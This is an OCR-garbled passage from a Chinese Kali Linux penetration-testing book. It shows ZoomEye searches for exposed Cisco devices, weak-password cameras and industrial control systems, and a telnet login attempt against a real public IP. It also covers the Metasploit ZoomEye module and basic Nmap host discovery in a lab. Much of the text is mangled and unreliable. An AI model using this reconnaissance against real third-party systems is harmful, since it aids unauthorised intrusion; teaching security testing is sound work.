ZoomEye 会 将 但 找到 的 设备 以 表格 列 出 ， 左 侧 的 “年 份 ” 给 出 了 不 同 
年 份 发 现 的 设备 数量 , “国家 ”处 给 出 了 各 个 国家 中 Cicso 设 备 的 使 用 数 
量 ， 例 如 在 美国 找到 了 19408115 个 Cisco 的 设备 。 右 侧 则 是 以 列表 的 形 
式 给 出 了 找到 的 具体 设备 ， 如 果 想 要 查看 相关 信息 的 话 ， 可 以 单 击 这 台 
设备 的 耳 地址 ， 我 们 随机 选择 其 中 的 一 全 设备 〈 见 图 3-32) 。 


129.117.39.43 


基本 信息 





^. 

Bainu Ba L. Me 
UD 6 2018 Baidu - GS(2016)20898 - Eglise 1 100930 - BSICPXEO: 
2082/telnet EXIT 
6080/telnet 
9091/teinet 


图 3-32 ”设备 的 基本 信息 


如 果 我 们 想 要 对 设备 的 痕 口 信息 进行 进一步 验证 的 话 ， 可 以 下 看 页 
面 下面 的 信息 ， 如 图 3-33 上 所 示 。 


22/ssh 


23/telnet 


图 3-33 ”设备 的 端口 详细 信息 


根据 找到 的 信息 ， 我 们 可 以 竹 试 对 这 个 设备 进行 telnet 连 接 ， 图 3-34 
给 出 了 设备 的 登录 验证 过 程 。 


root(Qkali: ~ 
File Edit View Search Terminal Help 
:~# telnet 129.117.39.43 
Trying 129.117.39.43... 
Connected to 129.117.39.43. 
Escape character is '^]'. 


User Access Verification 





Password: B 


图 3-34 设备 的 Telnet 登 录 验 证 过 程 


好 的 ， 现 在 我 们 找到 了 一 人 台 可 以 使 用 SSH 和 Telnet 登 录 的 设备 的 地 
址 ..39.43， 这 坪 一 个 十 分 重要 的 信息 。 太 外， 我 们 还 可 以 利用 搜索 疆 
左 侧 的 “国家 ”列表 ， 选 择 对 设备 的 所 在 位 置 进行 限定 〈 见 图 3-35) 。 


EE 
United States 19.408 
Canada 
China 
Mexico 385,983 
Russia 
Argentina 757 856 

Brazil 

Italy 79.60 

United Kingdom 57 604 

India 32,555 

图 3-35 Cisco 设备 在 全 球 的 分 布 

图 3-36 列 出 了 使 用 Cisco 设 备 数量 最 多 的 10 个 国家 ， 我 们 可 以 在 其 中 

选择 一 个 国家 ， 例 如 现在 来 得 看 在 整个 加 拿 大 的 Cisco 设 备 的 话 ， 我 们 
束 可 以 在 国家 列表 上 选择 Cannada。 


图 3-37 显 示 了 在 加 拿 大 找到 的 所 有 Cisco 设 备 。 


国家 


United States 19.408 115 





Russi EC FEJ 
1 TE n d "LI F rL] 
i =l mt l E — md Sai iim 


m-— pm — mm 


N esl: = FE Dri 
Argentna 二 了 | 0230 
Brazil OC 46D 
Az] LFA, -L 


Italy 179,601 


United Kingdom 157,694 


India 155 655 
图 3-36 ”选择 加 拿 大 





(7 24.122.247.108 
HTTP/1.1 400 Bad Request (5 
Server: httpd 
Date: Wed, 07 Feb 2018 17:44:50 GMT 


网 站 171 ti 


(7 174.4.101.247 

HTTP/1.1 401 Unauthorized 
Content-Type: text/html;charset-iso-8859-1 
Connection: Keep-Alive 


14 5534 B 


图 3-37” Cisco 设备 在 加 拿 大 的 分 布 


男 外 ， 我 们 也 可 以 使 用 命令 的 方式 来 完成 搜索 ， 例 如 我 们 需要 将 但 
找 设备 的 地 理 位 置 限定 在 日 本 ， 吏 可 以 使 用 关键 词 “country”， 日 本 的 
acl 我 们 可 以 在 搜索 栏 中 输入 : Cisco country: JP， 如 图 3- 
38 所 示 。 


我 们 在 日 本 找到 了 116914 个 Cisco 设 备 。 选 择 其 中 的 一 个 ， 点 击 IP 地 


址 可 以 看 到 这 个 设备 的 详细 信息 〈 见 图 3-39) 。 另 外 ， 在 图 3-39 中 ， 
ZoomEye 还 根据 IP 地 址 标识 出 来 了 该 设备 的 所 在 地 址 。 





图 3-38 ” Cisco 设备 在 日 本 的 分 布 
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图 3-39 ”在 地 图 上 对 设备 定位 
3.3.2 ZoomEye' HR $8 ig] 
同样 ， 我 们 也 可 以 直接 在 命令 行 中 使 用 关键 词 定 位 到 城市 ， 例 如 我 


ta HABIKBAI, uin] ERREPA “City:Osaka”, Znf3-40 
7N o 


(City:Osaka 





图 3-40 ”定位 到 指定 城市 
下 面 我 们 来 胎 看 一 些 第 见 的 关键 词 。 


hostname: 搜索 指 定 的 主机 或 域名 ， 例如 hostname:google.com. 
port: 搜索 指 XE HJH 口 或 服务 ， 例 如 port:21. 

country: 搜索 指定 的 国家 ， 例如 country:china。 

city: 搜索 指定 的 城市 ， 例 如 city:bejing。 


os: 搜索 指定 的 操作 系统 ， 例 如 os:windows。 

app: 搜索 指定 的 应 用 或 产品 ， 例 如 app: ProFTD. 
device: 搜索 指定 的 设备 类 型 ， 例 如 device:router。 

ip: 搜索 指定 的 IP 地 址 ， 例 如 ip:192.168.1.1。 

cidr: 搜索 指定 的 cidr 格 式 地 址 ， 例 如 cidr:192.168.1.1/24。 
service: 搜索 指定 的 服务 类 型 ， 例 如 service:http。 


这 个 搜索 引擎 能 完成 很 多 看 起 来 不 可 能 完成 的 任务 ， 例 如 我 们 前 面 
所 到 的 查找 出 所 有 连接 到 互联 网 上 的 摄像 头 。 万 外 ， 由 于 目前 市 面 上 很 
多 在 售 的 摄像 头 都 存在 认证 纪 过 的 问题 ， 而 且 很 多 用 户 使 用 了 能 口令 ， 
这 都 会 叶 人 怪 大 量 个 人 隐私 的 泄露 。 图 3-41 所 示 束 是 使 用 ZoomEye 在 互联 
网 上 获取 的 一 个 摄像 头 。 


m. 
8529/http HTTP/1.1 288 Ok 
^enyep Metwave IP Camera 


cm Date: Thu, 88 Feb 2018 11:58:13 GMT 
Content ze: text/html 


图 3-41 ”在 互联 网 上 获取 的 一 个 摄像 类 


义 或 者 我 们 希望 胆 看 在 大 阪 使 用 的 操作 系统 为 Windows 的 谈 备 ， 两 
个 条 件 之 间 可 以 使 用 空格 和 “+” 连 接 ， 例 如 : 


os:windows +city:Osaka， 结 果 如 图 3-42 上 所 示 。 


义 或 者 我 们 布 望 全 看 余 个 机 构 的 设备 ， 例 如 麻 管 理工 学 院 的 设备 ， 
那么 束 可 以 使 用 命令 ， 结 果 如 图 3-43 所 示 。 


hostname:mit.edu 


相 比 起 Shodan，ZoomEye 在 Web 应 用 方面 具有 更 大 的 优势 ， 鉴 于 
Web 安 全 并 非 本 书 的 重点 ， 所 以 并 不 会 在 这 个 方面 进行 深入 的 讲解 。 对 
此 感 兴 趣 的 读者 可 以 参考 ZoomEye 网 站 上 给 出 的 帮助 文件 ， 而 我 也 将 在 
后 续 编 写 的 图 书 中 对 这 个 方面 再 进行 更 加 评 细 的 介绍 。 
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info [user|pass|generic|transact] 
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E Content-Type: text/html 


€ Server: Microsoft-IIS/6.0 v 
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(7 18.1.40.33 


443/http HTTP/1.1 302 Found 
a. Expires: Wed, 01 Jan 1997 12:00:00 GMT 


g> 
or 


图 3-43 ” 扫 摘 指定 域名 的 设备 
3.3.3 ZoomEye 中 的 工业 控制 系统 的 否 找 蕊 能 


除了 这 些 功 能 之 外 ，ZoomEye 还 提供 了 对 工业 控制 系统 的 会 找 功 


能 ， 利 用 这 个 功能 可 以 得 找 世 界 上 连接 到 了 互联 网 的 工业 控制 系统 ， 这 
个 功能 的 页 面 地 址 为 https:/www. zoomeye.org/topic?id-ics project. WH f] 
3-44 甩 不 。 


ZoomEye ^ se ss sez M 


通过 ZoomEye 探索 世界 各 地 工业 控制 系统 





图 3-44 ”ZoomEye 中 的 工业 控制 系统 查找 功能 
该 页 面 分 成 了 上 下 两 个 部 分 ， 如 图 3-45 所 示 。 


通过 ZoomEye 探索 世界 各 地 工业 控制 系统 


TCP MO2 TCP #818 


port:102 X port:502 @ port2404 @ port20000 @ port44818 @ 


UDP #7808 TCP o Hed 


port789 (à 


Cimplicity 


Eplus - B/IP to B/WS Gateway 
Firewall 





图 3-45 ”ZoomEye 中 的 工业 控制 系统 查找 界面 


图 3-45 的 “Protocols” 部 分 给 出 了 各 种 工业 控制 设备 常用 的 六 口 ， 下 
面 的 “Products” 部 分 列 出 了 各 种 流行 的 设备 ， 如 图 3-46 所 示 。 





图 3-46 ”ZoomEye 中 提供 的 各 种 三 丙 的 设备 


例如 ， 我 们 需要 在 全 球 范 围 内 咎 找 Adcon Telemetry ix. Win LA 
选择 Adcon Telemetry 右 而 的 A850 Telemetry Gateway， 结 果 如 图 3-47 所 
7N o 


( A850 Telemetry Gateway 





挫 索 结 早 


(7 67.43.216.130 


2332/http HTTP/1.0 200 C 


=- Connection: close 
Content pe: text/html 


88.249.255.206 


1900/unknown HTTP/1.1 200 0 
Server: Custom/1.08 UPnP 2 Pro 


Location: http://192.168.1.1:5431/dynde | 
(7 92.86.0.94 
T Edd 
Content-Type: text/html 


图 3-47 frjX sli Adcon Telemetry x $& 


TE XX ^ LIBUS n] ELEC IAE 8H OI RII E RI DAP dr IE EZTHJ 
相关 漏洞 处 碍 看 这 些 信息 ， 如 图 3-48 所 示 。 


opencart 


2016-04-28 dá * OpenCart json decode function 迹 程 代 侈 执行 洞 洞 

2014-06-03 # + OpenCart 1.5.5.4 BA] 

2012-04-00 * 4 OpenCart 1.x dtr E ifl 

2012-04-09 A ded nenCart Lx FEE PE HH sinl 

009-04-27 # pencart (route) Local File Inclusion Vulnerab... 
nginx 

2017-07-13 * + * Nginx Remote Integer Overflow Vulnerability(CVE-2017... 

2016-11-16 e * Nginx MIREA (Debian, UbuntuZefThE) 

2015-09-06 sr + nginx 0.5.6 - 1.7.4 SSL session vulnerable 

2014-03-31 * s Nginx SPDYSESm e iHi 

2013-07-10 de ++ nginx 1,3.9/1,4.0 x86 Brute Force Remote Exploit 


图 3-48 ”ZoomEye 中 提供 的 Adcon Telemetry 设 备 漏 洞 信息 
3.3.4 ”在 Metasploit 中 加 载 ZoomEye 皇 件 


当 你 在 ZoomEye 中 注册 了 一 个 用 尸 之 后 ，ZoomEye 会 同 你 提供 一 个 
免费 的 帐户， 我们 可 以 在 其 他 工具 中 使 用 ZoomEye 提 供 的 API 功 能 。 下 
载 安装 这 个 API 的 命令 为 : 


$ sudo easy install zoomeye-SDK 
或 者 
$ sudo pip install git+https://github.com/ZoomEye/SDK.git 


然后 我 们 残 可 以 在 Metasploit 中 使 用 ZoomEye 皇 件 了 ， 其 体 的 使 用 
方法 如 下 : 


1) 在 Kali linux2 中 启动 Metasploit。 


2) 如 图 3-49 所 示 ， 在 Kali linux2 中 使 用 auxiliary/gather/ 
Zoomeye_search 模 块 。 





msf » use auxiliary/gather/zoomeye search 


图 3-49  fEMetasploit" fii H]zoomeye. search 
3) 然后 使 用 “show options” 来 查看 所 需 选 项 ， 如 图 3-50 所 示 。 


msf auxiliary( ) » show options 


Module options (auxiliary/gather/zoomeye search): 


Name Current Setting Required Description 


MAXPAGE Max amount of pages to collect 

PASSWORD The ZoomEye password 

RESOURCE ZoomEye Resource Type (Accepted: hos 
t, web) 

USERNAME The ZoomEye username 

ZOOMEYE DORK The ZoomEye Dock 





图 3-50 ”使 用 “show options” 


4) 输入 之 前 在 ZoomEye 注 册 时 使 用 的 用 户 名 和 和 密码， 如 图 3-51 所 


人 


ZJN o 


msf auxiliary( ) > set USERNAME ME 
USERNAME —— | 


msf auxiliary( ) > set PASSWORD Q? 
PASSWORD =>  — 5 O 1 


[3-51 在 ZoomEye 注 册 时 使 用 的 用 户 名 和 密码 


5) 将 ZOOMEYE_DORK 设 置 为 要 搜索 的 关键 词 ， 如 图 3-52 所 示 。 


msf auxiliary( ) > set ZOOMEYE DORK cisco 








Z00MEYE DORK => cisco 


图 3-52 ZOOMEYE DORK 设 置 为 CISCO 
6) 输入 run 执 行 。 
7) 很 快 束 可 以 看 到 结果 了， 如 图 3-53 所 示 。 


msf auxiliary( ) » run 
ZoomEye host Search: cisco - page: 1 
Host: 193.158.101.74 ,PORT: 110 
Host: 152.22.242.29 ,PORT: 9080 
Host: 129.117.39.43 ,PORT: 6080 
Host: 78.102.216.210 ,PORT: 2082 
Host: 1.22.172.114 „PORT? 443 
Host: 1.44.59.94 ,PORT: 443 
Host: 1.119.139.50 ,PORT: 443 
Host: 1.244.129.72 ,PORT: 443 
Host: 1.230.234.120 ,PORT: 443 
IDEHIB rE AEE LUE T I 
Host: 1.34.227.37 ,PORT: 443 
Host: 1.186.210.1 ,PORT: 443 
Host: 1.33.199.110 ,PORT: 443 
Host: 1:239. 15:220 Ee 
Host: 1.63.210.170 ,PORT: 443 
Host: 1.9.1477: 1AF AUGUE E 


图 3-53 ”执行 的 结果 





Pp 


3.4 ”小 结 


锌 动 扫 描 古 整个 渗透 测试 过 程 中 极为 重要 的 一 个 阶段 。 在 这 一 重 
中 ， 我 们 介绍 了 间接 扫 持 的 较为 优秀 的 3 种 工具 ， 分 别 是 Maltego、 
Recon-NG、 Zoomkye. 


Mtaltego 生 一 区 极为 优秀 的 信息 收集 工具 。 只 需要 给 出 一 个 域名 ， 
Maltego 束 可 以 为 我 们 找 出 和 该 网 站 大 量 相 关 的 信息 ， 例 如 子 域名 、IP 
地 址 段 、DNS 服 务 、 相 关 的 电子 邮件 信息 等 。 你 甚至 还 可 以 使 用 
Maltego 去 调查 一 个 人 的 信息 。Recon-NG 则 古 一 个 工具 集 ， 其 中 包含 了 
大 量 可 以 使 用 的 工具 ， 这 些 工具 分 列 提 供 了 不 同 的 信息 收集 功能 。 
ZoomEye 古 一 区 神奇 的 搜索 引擎 ， 利 用 这 个 引擎 我 们 可 以 在 互联 网 上 找 
到 大 量 配置 不 安全 的 设备 。 


好 了 ， 在 下 一 重 我 们 将 会 束 如 何 进行 主动 扫 摘 来 展开 介绍 。 


第 4 章 
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目标 主机 的 操作 系统 、 目 标 主机 上 运行 的 服务 等 。 


但 是 这 些 信 息 相 当 香 要 ， 试 想 一 下 如 来 一 台 主 机 根本 没有 连 上 网 
络 ， 那 么 我 们 对 其 进行 网 络 安 全 渗透 测试 还 有 什么 意义 呢 ? MA H PE 
机 是 人 耕 在 线 可 以 帮助 我 们 过 派 挥 无 音义 的 主机 ， 为 外 这 些 信息 还 可 以 玫 
助 我 们 建立 目标 的 网 络 拓扑 。 而 目标 病 口 、 操 作 系 统 和 服务 训 弃 则 是 进 
行进 一 步 渗透 训 试 的 重要 依据 。 


可 以 进行 主动 扫 朱 的 工具 也 有 很 多 ， 其 中 最 为 优秀 的 一 定 是 非 
Nmap 喘 属 。 


作为 当今 最 顶 兴 的 网 络 审计 工具 之 一 ，Nmap 在 国外 已 被 大 量 的 网 
络 安全 人 员 所 使 用 ， 它 的 喘 影 甚至 出 现在 了 很 多 的 优秀 影视 作品 中 ， 其 
SW 7I Hye eed pum (IRI my. (p GORGE) 
中 ，Tritnity 束 曾 使 用 Nmap 攻 击 SSH 服务 ， 从 而 人 破坏 了 发 电厂 的 工作 
(攻击 只 是 Nmap 的 副业 ， 扫 摘 才 是 Nmap 的 主要 功能 


Nmap 是 由 Gordon Lyon 设 计 并 实现 的 ， 于 1997 开 始 有 发 布 。Gordon 
Lyon 最 初 设计 Nmap 的 目的 只 是 希望 打造 一 秋 蝇 大 的 端口 扫 拉 工具。 但 
是 随 看 时 间 的 发展 ，Nmap 有 的 功能 越 来 越 全 面 ，2009 年 7 月 17 日 ， 开 源 网 
络 安全 扫描 工具 Nmap 正 式 发 布 了 5.00 版 ， 这 是 自 1997 年 以 来 最 重要 的 发 
ER Pt 的 网 络 问 口 扫 摘 软 件 变 里 为 全 方面 的 安全 工具 
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本 检测 功能 、 操 作 系 统 检测 功能 。 另 外 除了 这 些 基本 功能 之 外 ，Nmap 
还 可 以 实现 一 些 高 级 的 审计 扩 术 ， 例 如 伪造 发 起 扫 摘 闫 的 身份 、 进 行 隐 
和 散 的 扫 摘 、 规 避 目 标的 防御 设备 〈 例 如 防火 场 ) 、 对 系统 进行 安全 漏洞 
检测 并 提供 完善 的 报告 选项 等 。 在 后 来 的 不 断 发 展 中 ， 随 着 Nmap 强 大 
ET SENSERJjEHI, 4EM A du] EJ E em NmapH 8T B5 BERR 


如 果 我 们 使 用 Nmap 对 一 台 计 算 机 进行 审计 的 话 ， 最 终 可 以 获得 如 
下 的 目标 信息 : 


目标 主机 是 个 在 线 。 

目标 主机 所 在 网 络 的 结构 。 

目标 主机 上 开放 的 端口 ， 例 如 880 端口 、135 端 口 、443 端 口 等 。 

目标 主机 所 使 用 的 操作 系统 ， 例 如 Windows 7、Windows 10、Linux 
2.6.18、Android 4.1.2 等 。 

目标 主机 上 所 运行 的 服务 以 及 版 本 ， 例 如 Apache httpd 2.2.14. 
OpenSSH 5.3p1 Debian 3ubuntu4 等 。 

昌 标 主机 上 所 和 存在 的 漏洞 ， 例如 弱 口 令 、ms08_067、ms10_054 


41 Nmap 的 基本 用 法 


启动 Nmap 的 方法 和 Kali 中 其 他 工具 的 启动 方法 是 一 样 的 。 和 上 一 章 
中 介绍 的 几 个 工具 一 样 ，Nmap 也 位 于 信息 收集 的 分 类 中 。 单 击 左 上 角 
的 “Apploications”， 然 后 在 下 拉 沫 单 中 依次 选择 “01 信 息 收 集 ?/ nmap”, 
启动 之 后 Nmap 的 界面 如 图 4-1 所 示 。 


root@kali: ~ o o0 


File Edit View Search Terminal Help 


Nmap 7.40 ( https://nmap.org ) 

Usage: nmap [Scan Type(s)] [Options] {target specification} 

TARGET SPECIFICATION: 
Can pass hostnames, IP addresses, networks, etc. 
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 
-iL <inputfilename>: Input from list of hosts/networks 
-iR «num hosts»: Choose random targets 
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks 
--excludefile <exclude file>: Exclude list from file 

HOST DISCOVERY: 
-SL: List Scan - simply list targets to scan 
-sn: Ping Scan - disable port scan 
-Pn: Treat all hosts as online -- skip host discovery 
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
-PO[protocol list]: IP Protocol Ping 
-n/-R: Never do DNS resolution/Always resolve [default: sometimes] 
--dns-servers <serv1l[,serv2],...>: Specify custom DNS servers 
--System-dns: Use 0S's DNS resolver 
--traceroute: Trace hop path to each host 

SCAN TECHNIQUES: 
-SS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans 
-SU: UDP Scan 
-SN/sF/sX: TCP Null, FIN, and Xmas scans 


图 4-1 Nmap 的 启动 界面 





1， 对 单个 主机 的 扫描 


使 用 Nmap 最 简单 的 方式 就 是 在 命令 行 中 输入 “map” 以 及 < 目标 卫 地 
址 >， 例如 : 


root@kali:~#nmap 192.168.169.131 


图 4-2 给 出 了 一 个 人 简单 的 扫 插 过 程 的 结 


root@kali: ~ o o0 
File Edit View Search Terminal Help 
# nmap 192.168.169.131 


api k e SR ttps://nmap.org ) at 2017-08-08 20:41 EDT 
r 192. xr 169.131 
os i js m "0022s Pe tency). 
shown: 989 clos tua 
STATE SEU 


n 
C 
C Address 00:0C:29:2D:7F:89 (VMware) 





open 
open 
open 
open 
open 
open 
open 
open 
open 
open 

open 

r - 

~ | 

# 


IP address (1 host up) s ned in 6.07 seconds 
| 


图 4-2 ”使 用 Nmap 对 192.168.169.131 扫 描 的 结 


在 第 一 行 中 给 出 了 Nmap 的 版 本 为 7.40， 扫 描 开 始 时 间 为 2017-08-08 
20:41 


第 二 


二 行 是 一 个 标题 ， 生 成 的 是 关于 192.168.169.131 主 机 的 报告 。 


第 三 行 给 出 目标 主机 的 状态 为 up (意味 着 这 台 主 机 是 处 于 开机 并 连 
上 了 互联 网 的 状态 ) 。 


第 四 行 表 示 在 进行 检查 的 1000 个 端口 中 ， 有 989 个 是 关闭 的 。 


接 下 来 是 一 张 表 ， 这 个 表 中 一 共有 3 个 字段 ， 分 别 是 PORT、 
STATE、SERVICE， 其 中 PORT 指 的 是 端口 、STATE 指 的 是 状态 、 
SERVICE 指 的 是 运行 的 服务 。 


例如 第 六 行 的 PORT 列 的 值 为 80/TCP，STATE 列 的 值 为 open， 
SERVICE 列 的 值 为 http， 完 AE HU Er XUL Nmap A 9I 目标 计算 机 上 的 80 号 
问 口 目前 处 于 开放 状态 ， 这 个 病 口 提供 着 http 服 务 。 


接 下 来 的 第 十 七 行 给 出 了 目标 主机 的 硬件 地 址 为 
00:0C:29:2D:7F:89， 这 是 一 台 VMware 的 虚拟 机 。 


第 十 八 行 给 出 了 经 过 对 1 台 主 机 进行 扫 摘 ， 发 现 1 人 台 状 态 为 up 的 主 
机 ， 耗 时 6.07s。 


Nmap 还 文 持 大 量 的 参数 ， 这 些 参数 是 以 横 线 形式 表示 ， 例 如 -Sn， 


需要 注意 的 是 Nmap 中 的 参数 区 分 大 小 写 。 默 认 情 况 下 ，Nmap 会 对 目标 
同时 进行 在 线 状 态 和 问 口 扫 摘 ， 使 用 -sn 参数 则 只 进行 在 线 状 态 扫 摘 ， 
例如 我 们 还 对 192.168.169.131 进 行 在 线 状 态 扫 描 : 


root@kali:~#nmap -sn192.168.169.131 


扫 插 的 结果 如 图 4-3 所 示 。 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-08 21:03 EDT 
Nmap scan report f 


or 192.168.169.131 
Host is up (0.00018s latency). 
MAC Address: 00:0C:29:2D:7F:89 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds 





图 4-3 ”使 用 -sn 参数 对 192.168.169.131 扫 描 的 结 
2. 对 多 个 不 连续 的 主机 进行 扫 摘 
Nmap 可 以 一 次 扫描 多 个 主机 ， 如 果 这 些 扫描 的 目标 地 址 没有 任何 
的 关系 ， 那 么 可 以 使 用 将 目标 地 址 用 空格 分 隅 开 的 方式 来 同时 对 这 些 主 
机 进行 扫描 。 
命令 语法 : nmap [ 扫 摘 目标 1 扫 摘 目标 2 ..………. Hi H Ein] 


我 们 来 对 192.168.169.1、192.168.169.2、192.168.169.100 这 3 台 主 机 
进行 扫 摘 ， 束 可 以 使 用 如 下 命令 : 





root@kali:nmap 192.168.169.1 192.168.169.2 192.168.169.100 


扫 插 的 结果 如 图 4-4 所 示 。 


root@kali: ~ o © Q 
File Edit View Search Terminal Help 
:~# nmap 192.168.169.1 192.168.169.2 192.168.169.100 





Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-08 20:53 EDT 
Nmap scan report for 192.168.169.1 
ost is up (0.00032s latency). 
Not shown: 984 closed ports 
R STATE SERVICE 
n msrpc 
n netbios-ssn 
n microsoft-ds 
unknown 
n iss-console-mgr 
-IIS 


open fmsas 
MAC Address: 00:50:56:C0:00:08 (VMware) 


on 192.168.169.2 are closed 
MAC Address: 00:50:56:F5:3E:BB (VMware) 


Nmap done: 3 IP addresses (2 hosts up) scanned in 1.61 seconds 
TM 
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这 里 面 我们 对 3 个 IP 的 主机 进行 了 扫 换 ， 其 中 在 线 的 主机 有 两 个 ， 
不 在 线 的 有 一 个 。 


3. 对 连续 范围 内 的 主机 进行 扫 折 


在 刚刚 的 例子 中 我 们 已 经 看 到 了 如 何 对 一 个 目标 进行 扫 朱 ， 现 在 我 
们 来 对 指定 范围 内 多 个 目标 进行 扫描 : 


命令 语法 : nmap [IP 地 址 的 范围 ] 

例如 在 刚刚 的 情形 中 ， 我 们 残 可 以 输入 如 下 的 命令 来 选择 扫 摘 从 
192.168.169.1-255 的 主机 ， 这 里 面 为 了 保证 速度 ， 我 们 使 用 了 -sn 参数 ， 
这 个 参数 的 意义 是 只 扫描 是 个 在 线 ， 不 扫 摘 病 口 : 

root@kali:nmap -Sn 192.168.169.1-255 


图 4-5 给 出 的 是 扫 插 的 结果 。 


root@kali: ~ o o0 
File Edit View Search Terminal Help 
:~# nmap -sn 192.168.169.1-255 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-08 21:07 EDT 
Nmap scan report for 192.168.169.1 
Host is up (0.00041s latency). 
MAC Address: ipia T Maias 
Nmap scan report for 192.168.1 
Host is up (0.00069s drea 
MAC Address: 00:50:56:F5:3 ei aec 
2. 31 


Nmap scan report for 192.168. 

Host is up (0.000049s latenc d 

MAC Address: 00:0C:29:2D:7F:89 (VMware) 

Nmap scan report for 192.168.169.254 

Host is up (0.00039s latency). 

MAC Address: 00:50:56:E5:37:D7 (VMware) 

Nmap scan report for 192.168.169.130 

Host is u 

Nmap done: HE IP addresses (5 hosts up) scanned in 2.09 seconds 





Kja-5 ”使 用 Nmap 对 连续 范围 的 主机 进行 扫描 的 疆 


在 这 里 我 们 可 以 看 到 通过 这 次 扫 朱 ， 在 这 个 子 网 中 共有 5 人 台 设 备 。 
为 外 我 们 为 了 市 约 扫 插 时 间 ， 所 以 使 用 了 -sn 参数 。 


4. 对 整个 子 网 进行 扫 手 


Nmap 文 持 使 用 CIDR 的 方式 来 扫描 整个 子 网 : 
命令 语法 : nmap [IP 地 址 / 掩 人 码 位 数 ] 


还 是 以 刚才 的 情形 为 例 ， 如 果 要 扫 摘 整 Uu 168. 169.1 
~192.168.169.255 范 围 的 话 ， 你 还 可 以 使 用 如 下 命 


root@kali:nmap -sn 192.168.169.1/24 


图 4-6 给 出 的 是 扫 摘 的 结 条 。 


root@kali: ~ o o 0 
File Edit View Search Terminal Help 
:~# nmap -sn 192.168.169.1/24 


Starting Nmap 7.40 ( ier Vd ees org ) at 2017-08-08 21:09 EDT 

Nmap scan report for 192. "mi 

Host is up (0.00017s rb. 

MAC Address: 00:50:56:C0:00:08 (VMware) 

Nmap scan report for 192.168.169.2 

Host is up (0.000078s latency). 

MAC Address: 00:50:56:F5:3E:BB (VMware) 

Nmap scan report for 192.168.169.131 

Host is up (0.00019s latency). 

MAC Address: 00:0C:29:2D:7F:89 (VMware) 

Nmap scan report for 192.168.169.254 

Host is up (0.00023s latency). 

MAC Address: 00:50:56:E5:37:D7 (VMware) 

Nmap scan report for 192.168.169.130 

Host is u 

Nmap done: r: IP addresses (5 hosts up) scanned in 1.95 seconds 
:~# 





图 4-6 ”使 用 Nmap 对 整个 于 网 的 主机 进行 扫 手 的 结 
扫 插 的 结 来 和 上 一 个 例子 一 样 ， 同 样 也 是 5 台 主 机 在 线 。 


42 ”使 用 Nmap 进 行 主 机 发 现 


我 们 经 常 有 这 样 的 经 验 ， 束 是 当 网 络 不 通 的 时 候 ， 要 去 ping 一 下 网 
关 ， 来 检查 网 关 是 否 正常 。 这 其 实 和 主机 发 现 的 原理 是 一 样 的 。 当 测试 
的 目标 是 一 个 网 络 时 ， 显 然 只 有 其 中 在 线 〈( 也 束 是 开机 并 联网 ) 的 主机 
才 是 我 们 的 目标 ， 那 么 我 们 束 需 要 使 用 主机 发 现 技术 来 找 出 这 些 目 标 。 
Nmap 中 提供 了 很 多 种 的 主机 发 现 方 法 ， 这 些 方法 大 都 与 TCP/P 协 议 族 
中 的 协议 相对 应 。 


1. 跳 过 Ping 扫 描 阶 段 

通 第 Nmap 在 进行 其 他 扫描 之 前 ， 都 会 对 目标 进行 一 个 Ping 扫 摘 。 
如 末 目 标 对 Ping 扫 摘 没 反应 的 话 ， 了 驶 会 御 接 结 束 整 个 扫 摘 过 程 。 这 种 方 
法 可 以 跳 过 那些 没有 啊 应 的 主机 ， 从 而 市 管 大 量 的 时 间 ， 但 是 如 琳 目 标 
主机 其 实在 线 ， 但 是 采用 霖 种 手段 屏 表 了 Ping 扫 朱 ， 那 么 束 会 因此 也 了 驮 
过 我 们 的 其 他 扫 拉 操作。 所 以 我 们 可 以 指定 无 论 目标 是 售 啊 应 Ping 扫 
摘 ， 都 要 将 整个 扫 摘 过 程 完 成 的 参数 : 

语法 规则 : nmap -PN[ 目 标 ] 


图 4-7 给 出 了 扫描 的 结 


root@kali: ~ o © o0 
File Edit e" Search Terminal Help 
:-4 nmap -PN 192.168.169.131 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-08 21:19 EDT 
Nmap scan report for 192. au 169.131 
up (0.00026s latency). 
91 cLosed ports 
STATE SERVICE 


STEC 
MAC a ee (VMware) 





Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds 
4 国 


图 4-7 ”使 用 -PN 参数 跳 过 Ping 扫 摘 阶 段 的 疆 
2. 仅 使 用 Ping 协 议 进行 主机 发 现 


和 上 面 的 例子 刚好 相反 ， 有 时 候 我 们 要 对 太 量 的 主机 进行 扫 摘 ， 例 
如 同时 对 上 万 人 台 计 算 机 进行 扫描 《当然 这 种 情况 极 少 ) ，Nmap 如 果 对 
一 个 目标 采用 各 种 手段 进行 扫描 的 话 ， 那 么 会 花费 大 量 的 时 间 。 这 时 我 
们 可 以 选择 只 对 目标 采用 Ping 扫 摘 方式 ， 那 么 这 种 方式 所 使 用 的 参数 为 - 
SP 。 


语法 规则 : nmap -sP [目标 ] 


扫描 的 结果 如 图 4-8 所 示 。 


root@kali: ~ o oo0 
File Edit View Search Terminal Help 
:~# nmap -SP 192.168.169.131 


Startin ng Nmap 7. E E. https://nmap.org ) at 2017-08-08 21:39 EDT 
Nmap scan report r 192.168.169.131 

Host is du (0. edat latency 

MAC Address: 00:0C:29:2D:7F:89 (VMware) 





Nmap done: 1 Hri address (1 host up) scanned in 0.11 seconds 
# 


图 4-8  fEHj-sPZSADOI H ERE4TPingj ji HJ Zi 5 
3. 使 用 ARP 协 议 进 行 主机 发 现 
当 目 标 主机 与 我 们 处 于 同一 网 段 的 时 候 ， 使 用 ARP 协 议 扫 摘 技 术 束 


是 最 佳 的 选择 。 不 仅 速 度 最 快 ， 扫 插 结 末 也 是 最 为 精准 的 。 这 是 因为 没 
有 任何 的 安全 措施 会 阻止 正 芝 的 ARP 请 求 。 


使 用 nmap 的 选项 -PR 就 可 以 实现 ARP 协 议 的 主机 发 现 。 
语法 规则 : nmap -PR [目标 ] 


图 4-9 给 出 了 扫 摘 的 结 


root@kali: ~ o o Q0 
File Edit View Search Terminal Help 
# nmap -PR 192.168.169.131 
